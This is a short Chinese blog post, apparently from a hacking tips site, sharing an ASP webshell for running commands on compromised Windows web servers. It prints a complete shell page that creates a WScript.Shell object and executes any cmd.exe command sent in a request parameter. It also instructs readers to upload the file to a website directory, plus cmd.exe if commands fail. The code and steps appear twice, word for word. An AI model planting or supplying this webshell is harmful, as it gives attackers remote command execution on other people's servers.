webshell提权经验分享
52人参与 • 2011-03-23 • 脚本攻防
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
要想让运行命令可以试试这种方法,成功率为五五之数。
把下面代码复制:
<object runat=server id=oscriptlhn scope=page classid="clsid:72c24dd5-d70a-438b-8a42-98424b88afb8"></object>
<%if err then%>
<object runat=server id=oscriptlhn scope=page classid="clsid:f935dc22-1cf0-11d0-adb9-00c04fd58a0b"></object>
<%
end if
response.write("<textarea readonly cols=80 rows=20>")
on error resume next
response.write oscriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
response.write("</textarea>")
response.write("<form method='post'>")
response.write("<input type=text name='c' size=60>
")
response.write("<input type=submit value='执行'></form>")
%>
保存为一个asp文件,然后传到网站目录上去
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
我用此成功运行过cacls命令。
第二那就是运行时出错,可能限制某些代码执行。
要想让运行命令可以试试这种方法,成功率为五五之数。
把下面代码复制:
复制代码
代码如下:<object runat=server id=oscriptlhn scope=page classid="clsid:72c24dd5-d70a-438b-8a42-98424b88afb8"></object>
<%if err then%>
<object runat=server id=oscriptlhn scope=page classid="clsid:f935dc22-1cf0-11d0-adb9-00c04fd58a0b"></object>
<%
end if
response.write("<textarea readonly cols=80 rows=20>")
on error resume next
response.write oscriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
response.write("</textarea>")
response.write("<form method='post'>")
response.write("<input type=text name='c' size=60>
")
response.write("<input type=submit value='执行'></form>")
%>
保存为一个asp文件,然后传到网站目录上去
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
我用此成功运行过cacls命令。
第二那就是运行时出错,可能限制某些代码执行。
赞 (0)
打赏
微信扫一扫
微信扫一扫
您想发表意见!!点此发布评论
发表评论